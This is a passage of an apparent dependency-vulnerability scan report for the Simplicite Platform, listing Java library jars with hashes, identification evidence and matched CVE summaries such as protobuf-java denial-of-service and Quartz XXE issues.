Apache-2.0: https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-iam-v1/0.12.0/proto-google-iam-v1-0.12.0.jar
MD5: 2adb121a4d06c28cf1669f904832e041
SHA1: ea312c0250a5d0a7cdd1b20bc2c3259938b79855
SHA256: ddabb48fe072ada50484c98f00893a3e1356b4f05d2d0bf0045bc830145d1e0c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-iam-v1 High Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name iam Highest Vendor jar package name iam Low Vendor jar package name v1 Highest Vendor jar package name v1 Low Vendor pom artifactid proto-google-iam-v1 Highest Vendor pom artifactid proto-google-iam-v1 Low Vendor pom developer email andrealin@google.com Low Vendor pom developer email garrettjones@google.com Low Vendor pom developer email hzyi@google.com Low Vendor pom developer email michaelbausor@google.com Low Vendor pom developer email neowu@google.co Low Vendor pom developer email pongad@google.com Low Vendor pom developer email vam@google.com Low Vendor pom developer id andreamlin Medium Vendor pom developer id garrettjonesgoogle Medium Vendor pom developer id hzyi-google Medium Vendor pom developer id michaelbausor Medium Vendor pom developer id neozwu Medium Vendor pom developer id pongad Medium Vendor pom developer id vam-google Medium Vendor pom developer name Andrea Lin Medium Vendor pom developer name Garrett Jones Medium Vendor pom developer name Hanzhen Yi Medium Vendor pom developer name Michael Darakananda Medium Vendor pom developer name Micheal Bausor Medium Vendor pom developer name Neo Wu Medium Vendor pom developer name Vadym Matsishevskyi Medium Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-iam-v1 High Vendor pom organization name Google LLC High Vendor pom url googleapis/api-client-staging Highest Product file name proto-google-iam-v1 High Product jar package name google Highest Product jar package name iam Highest Product jar package name iam Low Product jar package name v1 Highest Product jar package name v1 Low Product pom artifactid proto-google-iam-v1 Highest Product pom developer email andrealin@google.com Low Product pom developer email garrettjones@google.com Low Product pom developer email hzyi@google.com Low Product pom developer email michaelbausor@google.com Low Product pom developer email neowu@google.co Low Product pom developer email pongad@google.com Low Product pom developer email vam@google.com Low Product pom developer id andreamlin Low Product pom developer id garrettjonesgoogle Low Product pom developer id hzyi-google Low Product pom developer id michaelbausor Low Product pom developer id neozwu Low Product pom developer id pongad Low Product pom developer id vam-google Low Product pom developer name Andrea Lin Low Product pom developer name Garrett Jones Low Product pom developer name Hanzhen Yi Low Product pom developer name Michael Darakananda Low Product pom developer name Micheal Bausor Low Product pom developer name Neo Wu Low Product pom developer name Vadym Matsishevskyi Low Product pom groupid com.google.api.grpc Highest Product pom name proto-google-iam-v1 High Product pom organization name Google LLC Low Product pom url googleapis/api-client-staging High Version file version 0.12.0 High Version pom version 0.12.0 Highest
protobuf-java-3.10.0.jarDescription:
Core Protocol Buffers library. Protocol Buffers are a way of encoding structured data in an
efficient yet extensible format.
License:
https://opensource.org/licenses/BSD-3-Clause File Path: /var/simplicite/.m2/repository/com/google/protobuf/protobuf-java/3.10.0/protobuf-java-3.10.0.jar
MD5: ee4e91af9399c52cdad88bd078f5a71a
SHA1: 410b61dd0088aab4caa05739558d43df248958c9
SHA256: 161d7d61a8cb3970891c299578702fd079646e032329d6c2cabf998d191437c9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name protobuf-java High Vendor jar package name google Highest Vendor jar package name protobuf Highest Vendor Manifest automatic-module-name com.google.protobuf Medium Vendor Manifest bundle-docurl https://developers.google.com/protocol-buffers/ Low Vendor Manifest bundle-symbolicname com.google.protobuf Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid protobuf-java Highest Vendor pom artifactid protobuf-java Low Vendor pom groupid com.google.protobuf Highest Vendor pom name Protocol Buffers [Core] High Vendor pom parent-artifactid protobuf-parent Low Product file name protobuf-java High Product jar package name google Highest Product jar package name protobuf Highest Product Manifest automatic-module-name com.google.protobuf Medium Product Manifest bundle-docurl https://developers.google.com/protocol-buffers/ Low Product Manifest Bundle-Name Protocol Buffers [Core] Medium Product Manifest bundle-symbolicname com.google.protobuf Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid protobuf-java Highest Product pom groupid com.google.protobuf Highest Product pom name Protocol Buffers [Core] High Product pom parent-artifactid protobuf-parent Medium Version file version 3.10.0 High Version Manifest Bundle-Version 3.10.0 High Version pom version 3.10.0 Highest
CVE-2022-3171 suppress
A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-3509 (OSSINDEX) suppress
A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above. CWE-20 Improper Input Validation
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.google.protobuf:protobuf-java:3.10.0:*:*:*:*:*:*:* CVE-2022-3510 (OSSINDEX) suppress
A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-3510 for details CWE-noinfo
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.google.protobuf:protobuf-java:3.10.0:*:*:*:*:*:*:* CVE-2021-22569 suppress
An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions. NVD-CWE-noinfo
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
protobuf-java-util-3.10.0.jarDescription:
Utilities for Protocol Buffers License:
https://opensource.org/licenses/BSD-3-Clause File Path: /var/simplicite/.m2/repository/com/google/protobuf/protobuf-java-util/3.10.0/protobuf-java-util-3.10.0.jar
MD5: 2e87271cc08f426faf26f474f7308a74
SHA1: a68c906db83e93babbb4024ce91e7441bb7598dd
SHA256: 619b0b0dc344cb141e493cbedc5687c8fb7c985e609a1b035e621bfab2f89021
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name protobuf-java-util High Vendor jar package name google Highest Vendor jar package name protobuf Highest Vendor jar package name util Highest Vendor Manifest automatic-module-name com.google.protobuf.util Medium Vendor Manifest bundle-docurl https://developers.google.com/protocol-buffers/ Low Vendor Manifest bundle-symbolicname com.google.protobuf.util Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid protobuf-java-util Highest Vendor pom artifactid protobuf-java-util Low Vendor pom groupid com.google.protobuf Highest Vendor pom name Protocol Buffers [Util] High Vendor pom parent-artifactid protobuf-parent Low Product file name protobuf-java-util High Product jar package name google Highest Product jar package name protobuf Highest Product jar package name util Highest Product Manifest automatic-module-name com.google.protobuf.util Medium Product Manifest bundle-docurl https://developers.google.com/protocol-buffers/ Low Product Manifest Bundle-Name Protocol Buffers [Util] Medium Product Manifest bundle-symbolicname com.google.protobuf.util Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid protobuf-java-util Highest Product pom groupid com.google.protobuf Highest Product pom name Protocol Buffers [Util] High Product pom parent-artifactid protobuf-parent Medium Version file version 3.10.0 High Version Manifest Bundle-Version 3.10.0 High Version pom version 3.10.0 Highest
CVE-2022-3171 suppress
A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-22569 suppress
An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions. NVD-CWE-noinfo
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
proton-j-0.33.4.jarDescription:
Proton is a library for speaking AMQP. License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/qpid/proton-j/0.33.4/proton-j-0.33.4.jar
MD5: 1e03613999e16d99dfd735c7ae5befba
SHA1: ae78c5552b1ed6549fc5b51f9739e8dbd921ffc3
SHA256: 1d2bd1955536d9762229ad9e7e4d63baf2388095841a3839ba723241f201b838
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proton-j High Vendor jar package name apache Highest Vendor jar package name proton Highest Vendor jar package name qpid Highest Vendor Manifest automatic-module-name org.apache.qpid.proton.j Medium Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.qpid.proton-j Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid proton-j Highest Vendor pom artifactid proton-j Low Vendor pom groupid org.apache.qpid Highest Vendor pom name Proton-J High Vendor pom parent-artifactid proton-j-parent Low Product file name proton-j High Product jar package name amqp Highest Product jar package name apache Highest Product jar package name proton Highest Product jar package name qpid Highest Product Manifest automatic-module-name org.apache.qpid.proton.j Medium Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Proton-J Medium Product Manifest bundle-symbolicname org.apache.qpid.proton-j Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid proton-j Highest Product pom groupid org.apache.qpid Highest Product pom name Proton-J High Product pom parent-artifactid proton-j-parent Medium Version file version 0.33.4 High Version Manifest Bundle-Version 0.33.4 High Version pom version 0.33.4 Highest
qpid-jms-client-0.51.0.jarDescription:
The core JMS Client implementation License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/qpid/qpid-jms-client/0.51.0/qpid-jms-client-0.51.0.jar
MD5: 479f5e93eaa0a76d031cdc092cd525a1
SHA1: 45201d940dca87f04823bfdf39d6aae9b4a145f4
SHA256: 272e82564f995120816c5b5fab98cc1d9e195fbddc2a3a4be115a2e45b114767
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name qpid-jms-client High Vendor jar package name apache Highest Vendor jar package name jms Highest Vendor jar package name qpid Highest Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.qpid.jms.client Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid qpid-jms-client Highest Vendor pom artifactid qpid-jms-client Low Vendor pom groupid org.apache.qpid Highest Vendor pom name QpidJMS Client High Vendor pom parent-artifactid qpid-jms-parent Low Product file name qpid-jms-client High Product jar package name apache Highest Product jar package name jms Highest Product jar package name qpid Highest Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name QpidJMS Client Medium Product Manifest bundle-symbolicname org.apache.qpid.jms.client Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid qpid-jms-client Highest Product pom groupid org.apache.qpid Highest Product pom name QpidJMS Client High Product pom parent-artifactid qpid-jms-parent Medium Version file version 0.51.0 High Version Manifest Bundle-Version 0.51.0 High Version pom version 0.51.0 Highest
qrgen-1.4.jarDescription:
a simple QRCode generation api for java built on top ZXING License:
Apache License v2: http://www.apache.org/licenses/LICENSE-2.0.html File Path: /var/simplicite/.m2/repository/net/glxn/qrgen/1.4/qrgen-1.4.jar
MD5: 22aedd5cea2b5d4edc650ab1e08a1ff9
SHA1: fbb2465ec16db786a164e66f2a1e67e2e9254303
SHA256: 4985f423c0ced38a1b60ac0f2b76e9a260fe54a276ed313c362ae85fdbe39c35
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name qrgen High Vendor jar package name glxn Highest Vendor jar package name glxn Low Vendor jar package name net Highest Vendor jar package name net Low Vendor jar package name qrcode Highest Vendor jar package name qrgen Highest Vendor jar package name qrgen Low Vendor pom artifactid qrgen Highest Vendor pom artifactid qrgen Low Vendor pom developer email ken@glxn.net Low Vendor pom developer name Ken Gullaksen Medium Vendor pom groupid net.glxn Highest Vendor pom name QRGen High Vendor pom url http://kenglxn.github.io/QRGen/ Highest Product file name qrgen High Product jar package name glxn Highest Product jar package name glxn Low Product jar package name net Highest Product jar package name qrcode Highest Product jar package name qrgen Highest Product jar package name qrgen Low Product pom artifactid qrgen Highest Product pom developer email ken@glxn.net Low Product pom developer name Ken Gullaksen Low Product pom groupid net.glxn Highest Product pom name QRGen High Product pom url http://kenglxn.github.io/QRGen/ Medium Version file version 1.4 High Version pom version 1.4 Highest
quartz-2.3.1.jarDescription:
Enterprise Job Scheduler License:
http://www.apache.org/licenses/LICENSE-2.0.txt
Apache Software License, Version 2.0 File Path: /var/simplicite/.m2/repository/org/quartz-scheduler/quartz/2.3.1/quartz-2.3.1.jar
MD5: be3926e0e2d77e84f9f6a1bba18d2b49
SHA1: 8d4e9a8191092402e77a7d1edb5bbfd8b212186c
SHA256: 7b1e8d8a093ab2d102645397e200bdae7989f69f3e3df93c5e372ab00759ff46
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name quartz High Vendor hint analyzer vendor softwareag Highest Vendor jar package name job Highest Vendor jar package name quartz Highest Vendor jar package name scheduler Highest Vendor Manifest bundle-docurl http://www.terracotta.org Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Vendor Manifest bundle-symbolicname org.quartz-scheduler.quartz Medium Vendor Manifest terracotta-name quartz Medium Vendor Manifest terracotta-projectstatus Supported Low Vendor pom artifactid quartz Highest Vendor pom artifactid quartz Low Vendor pom groupid org.quartz-scheduler Highest Vendor pom name quartz High Vendor pom parent-artifactid quartz-parent Low Product file name quartz High Product jar package name job Highest Product jar package name quartz Highest Product jar package name scheduler Highest Product jar package name terracotta Highest Product Manifest bundle-docurl http://www.terracotta.org Low Product Manifest Bundle-Name quartz Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Product Manifest bundle-symbolicname org.quartz-scheduler.quartz Medium Product Manifest terracotta-name quartz Medium Product Manifest terracotta-projectstatus Supported Low Product pom artifactid quartz Highest Product pom groupid org.quartz-scheduler Highest Product pom name quartz High Product pom parent-artifactid quartz-parent Medium Version file version 2.3.1 High Version Manifest Bundle-Version 2.3.1 High Version pom version 2.3.1 Highest
CVE-2019-13990 suppress
initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-39017 suppress
quartz-jobs 2.3.2 and below was discovered to contain a code injection vulnerability in the component org.quartz.jobs.ee.jms.SendQueueMessageJob.execute. This vulnerability is exploited via passing an unchecked argument. NOTE: this is disputed by multiple parties because it is not plausible that untrusted user input would reach the code location where injection must occur. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions:
relaxng-datatype-2.3.2.jarFile Path: /var/simplicite/.m2/repository/com/sun/xml/bind/external/relaxng-datatype/2.3.2/relaxng-datatype-2.3.2.jarMD5: 0ebc89465bebcaedb3d97ed959b45fa8SHA1: d202e2c8bdd0a5286490260e311f0df1955f4dbfSHA256: 6a746e2e38eb08b755e1a6b1badc3ab99c1fce81159c1687974da868714a82f5Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name relaxng-datatype High Vendor jar package name datatype Highest Vendor jar package name rngdatatype Low Vendor jar package name sun Highest Vendor jar package name sun Low Vendor jar package name tools Low Vendor jar (hint) package name oracle Highest Vendor jar (hint) package name oracle Low Vendor pom artifactid relaxng-datatype Highest Vendor pom artifactid relaxng-datatype Low Vendor pom groupid com.sun.xml.bind.external Highest Vendor pom name RelaxNG Datatype High Vendor pom parent-artifactid jaxb-external-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name relaxng-datatype High Product jar package name datatype Highest Product jar package name helpers Low Product jar package name rngdatatype Low Product jar package name sun Highest Product jar package name tools Low Product pom artifactid relaxng-datatype Highest Product pom groupid com.sun.xml.bind.external Highest Product pom name RelaxNG Datatype High Product pom parent-artifactid jaxb-external-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version pom version 2.3.2 Highest
rhino-1.7.13.jarDescription:
Rhino is an open-source implementation of JavaScript written entirely in Java.
It is typically embedded into Java applications to provide scripting to end users.
License:
Mozilla Public License, Version 2.0: http://www.mozilla.org/MPL/2.0/index.txt File Path: /var/simplicite/.m2/repository/org/mozilla/rhino/1.7.13/rhino-1.7.13.jar
MD5: 17d7bed97d9c03a77578ec16e26bfc2f
SHA1: e6b2e12dc79fbdc58d8bf62a583705a551ec37d6
SHA256: 931dda33789d8e004ff5b5478ee3d6d224305de330c48266df7c3e49d52fc606
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name rhino High Vendor jar package name javascript Highest Vendor jar package name mozilla Highest Vendor Manifest built-date 2020-09-02 Low Vendor Manifest built-time 11:53:29 Low Vendor Manifest bundle-symbolicname org.mozilla.rhino Medium Vendor Manifest implementation-url http://www.mozilla.org/rhino Low Vendor Manifest Implementation-Vendor Mozilla Foundation High Vendor pom artifactid rhino Highest Vendor pom artifactid rhino Low Vendor pom groupid org.mozilla Highest Vendor pom organization name The Mozilla Foundation High Vendor pom organization url http://www.mozilla.org Medium Vendor pom url https://developer.mozilla.org/en/Rhino Highest Product file name rhino High Product jar package name javascript Highest Product jar package name mozilla Highest Product Manifest built-date 2020-09-02 Low Product Manifest built-time 11:53:29 Low Product Manifest bundle-symbolicname org.mozilla.rhino Medium Product Manifest Implementation-Title Mozilla Rhino High Product Manifest implementation-url http://www.mozilla.org/rhino Low Product pom artifactid rhino Highest Product pom groupid org.mozilla Highest Product pom organization name The Mozilla Foundation Low Product pom organization url http://www.mozilla.org Low Product pom url https://developer.mozilla.org/en/Rhino Medium Version file version 1.7.13 High Version Manifest Bundle-Version 1.7.13 High Version Manifest Implementation-Version 1.7.13 High Version pom version 1.7.13 Highest
rhino-1.7.13.jar: test.jsFile Path: /var/simplicite/.m2/repository/org/mozilla/rhino/1.7.13/rhino-1.7.13.jar/org/mozilla/javascript/tools/debugger/test.jsMD5: 3f4137118304ccd25816067cf8d1edd6SHA1: d3c7ae4c10cb6c7ac191cb65a39e53ba6a4e6cfbSHA256: 950d2db0a646488500b58ba76a02c33501a048708c083e3b743b73b16e105331Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence
rhino-js-engine-1.7.10.jarDescription:
A js-engine.jar that provides a script engine "rhino" with old Rhino JavaScript.
The source code for js-engine comes from https://java.net/projects/Scripting.
The Rhino engine itself is pulled by maven. Its source is at https://github.com/mozilla/rhino.
License:
The BSD 3-Clause License: https://opensource.org/licenses/BSD-3-Clause File Path: /var/simplicite/.m2/repository/cat/inspiracio/rhino-js-engine/1.7.10/rhino-js-engine-1.7.10.jar
MD5: 5543d39bea21e5c9515e8d967a61e1b1
SHA1: 09cc9336acf7bd2f370ae812d5713e90463edc33
SHA256: b47d73c223c86fd3f70470a9a8269626dbb6e9cb0195d062ba53171a2df7ff44
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name rhino-js-engine High Vendor jar package name javascript Highest Vendor jar package name phobos Low Vendor jar package name script Highest Vendor jar package name script Low Vendor jar package name sun Low Vendor jar (hint) package name oracle Low Vendor pom artifactid rhino-js-engine Highest Vendor pom artifactid rhino-js-engine Low Vendor pom developer email alex@inspiracio.cat Low Vendor pom developer name Alexander Bunkenburg Medium Vendor pom developer org inspiració.cat Medium Vendor pom developer org URL http://www.inspiracio.cat Medium Vendor pom groupid cat.inspiracio Highest Vendor pom name rhino-js-engine High Vendor pom url http://www.inspiracio.cat Highest Product file name rhino-js-engine High Product jar package name javascript Highest Product jar package name phobos Low Product jar package name script Highest Product jar package name script Low Product jar package name util Low Product pom artifactid rhino-js-engine Highest Product pom developer email alex@inspiracio.cat Low Product pom developer name Alexander Bunkenburg Low Product pom developer org inspiració.cat Low Product pom developer org URL http://www.inspiracio.cat Low Product pom groupid cat.inspiracio Highest Product pom name rhino-js-engine High Product pom url http://www.inspiracio.cat Medium Version file version 1.7.10 High Version pom version 1.7.10 Highest
rhino-js-engine-1.7.10.jar: toplevel.jsFile Path: /var/simplicite/.m2/repository/cat/inspiracio/rhino-js-engine/1.7.10/rhino-js-engine-1.7.10.jar/META-INF/toplevel.jsMD5: 491854ddbf3787e63aec2d77d4aad938SHA1: 0cc36fe5c5269749b8d94252d7490d2d82bda8edSHA256: 511041250766b0811a7767801a1bec1be89a5bddbbe9e455ad7ea2057ba473f7Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence
rngom-2.3.2.jarDescription:
RNGOM is a RelaxNG Object model library (XSOM for RelaxNG).
File Path: /var/simplicite/.m2/repository/com/sun/xml/bind/external/rngom/2.3.2/rngom-2.3.2.jarMD5: 16cae2e80f24e2cf10ad6b5d95114ae0SHA1: 6b8c5d0984c31a01d98290cee4ab9bde13536431SHA256: 02165b9f0020160873f13e29e243b02e5c578792f9d1f2367fbadfcf8374fc78Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name rngom High Vendor jar package name rngom Highest Vendor jar package name sun Highest Vendor jar package name xml Highest Vendor jar (hint) package name oracle Highest Vendor pom artifactid rngom Highest Vendor pom artifactid rngom Low Vendor pom groupid com.sun.xml.bind.external Highest Vendor pom name RNGOM High Vendor pom parent-artifactid jaxb-external-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name rngom High Product jar package name rngom Highest Product jar package name sun Highest Product jar package name xml Highest Product Manifest Implementation-Title RNGOM High Product pom artifactid rngom Highest Product pom groupid com.sun.xml.bind.external Highest Product pom name RNGOM High Product pom parent-artifactid jaxb-external-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version pom version 2.3.2 Highest
rome-1.12.1.jarDescription:
All Roads Lead to ROME. ROME is a set of Atom/RSS Java utilities that make it
easy to work in Java with most syndication formats. Today it accepts all flavors of RSS
(0.90, 0.91, 0.92, 0.93, 0.94, 1.0 and 2.0), Atom 0.3 and Atom 1.0 feeds. Rome includes
a set of parsers and generators for the various flavors of feeds, as well as converters
to convert from one format to another. The parsers can give you back Java objects that
are either specific for the format you want to work with, or a generic normalized
SyndFeed object that lets you work on with the data without bothering about the
underlying format.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/rometools/rome/1.12.1/rome-1.12.1.jar
MD5: ff2b10fb031f44513e5c291817aca032
SHA1: e9038b34b001007b2a1f3823c532f3524222075f
SHA256: 13414d70a6c185e1374588321861c6e9eb7928eee502d032094ef3ca0fd921ae
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name rome High Vendor jar package name atom Highest Vendor jar package name rome Highest Vendor jar package name rometools Highest Vendor jar package name rss Highest Vendor Manifest automatic-module-name com.rometools.rome Medium Vendor Manifest bundle-symbolicname com.rometools.rome Medium Vendor Manifest implementation-url http://rometools.com/rome Low Vendor Manifest Implementation-Vendor-Id com.rometools Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid rome Highest Vendor pom artifactid rome Low Vendor pom groupid com.rometools Highest Vendor pom name rome High Vendor pom parent-artifactid rome-parent Low Product file name rome High Product jar package name atom Highest Product jar package name rome Highest Product jar package name rometools Highest Product jar package name rss Highest Product Manifest automatic-module-name com.rometools.rome Medium Product Manifest Bundle-Name rome Medium Product Manifest bundle-symbolicname com.rometools.rome Medium Product Manifest Implementation-Title rome High Product Manifest implementation-url http://rometools.com/rome Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title rome Medium Product pom artifactid rome Highest Product pom groupid com.rometools Highest Product pom name rome High Product pom parent-artifactid rome-parent Medium Version file version 1.12.1 High Version Manifest Bundle-Version 1.12.1 High Version Manifest Implementation-Version 1.12.1 High Version pom version 1.12.1 Highest
rome-utils-1.12.1.jarDescription:
Utility classes for ROME projects File Path: /var/simplicite/.m2/repository/com/rometools/rome-utils/1.12.1/rome-utils-1.12.1.jarMD5: 6772713213cee7862e5e9ac1a8c0b79cSHA1: e14b9757402f0971fabe245f8a3ee7c889151f26SHA256: d65ce5f0926ee80e1ed19b176428846098000fc4db09360a1b4dd3a1a36ed477Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name rome-utils High Vendor jar package name rometools Highest Vendor jar package name utils Highest Vendor Manifest automatic-module-name com.rometools.rome.utils Medium Vendor pom artifactid rome-utils Highest Vendor pom artifactid rome-utils Low Vendor pom groupid com.rometools Highest Vendor pom name rome-utils High Vendor pom parent-artifactid rome-parent Low Product file name rome-utils High Product jar package name rometools Highest Product jar package name utils Highest Product Manifest automatic-module-name com.rometools.rome.utils Medium Product pom artifactid rome-utils Highest Product pom groupid com.rometools Highest Product pom name rome-utils High Product pom parent-artifactid rome-parent Medium Version file version 1.12.1 High Version pom version 1.12.1 Highest
Related Dependencies rome-1.12.1.jar: rome-utils-1.12.1.jarFile Path: /var/simplicite/.m2/repository/com/rometools/rome/1.12.1/rome-1.12.1.jar/rome-utils-1.12.1.jar MD5: 6772713213cee7862e5e9ac1a8c0b79c SHA1: e14b9757402f0971fabe245f8a3ee7c889151f26 SHA256: d65ce5f0926ee80e1ed19b176428846098000fc4db09360a1b4dd3a1a36ed477 pkg:maven/com.rometools/rome-utils@1.12.1 CVE-2021-4277 suppress
A vulnerability, which was classified as problematic, has been found in fredsmith utils. This issue affects some unknown processing of the file screenshot_sync of the component Filename Handler. The manipulation leads to predictable from observable state. The name of the patch is dbab1b66955eeb3d76b34612b358307f5c4e3944. It is recommended to apply a patch to fix this issue. The identifier VDB-216749 was assigned to this vulnerability. CWE-330 Use of Insufficiently Random Values
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions:
s3-2.2.0.jarDescription:
jclouds components to access an implementation of S3 License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/s3/2.2.0/s3-2.2.0.jar
MD5: fed1f33af4d2be951084edb7338be653
SHA1: 5e4e3d12349d8fd89ae35319df1f993be04694f8
SHA256: 964cb268008696ac2c12108ad43ba9dc03d5edb4cb1d69f5b37d138b4c249522
Referenced In Project/Scope: Simplicite Platform:compile
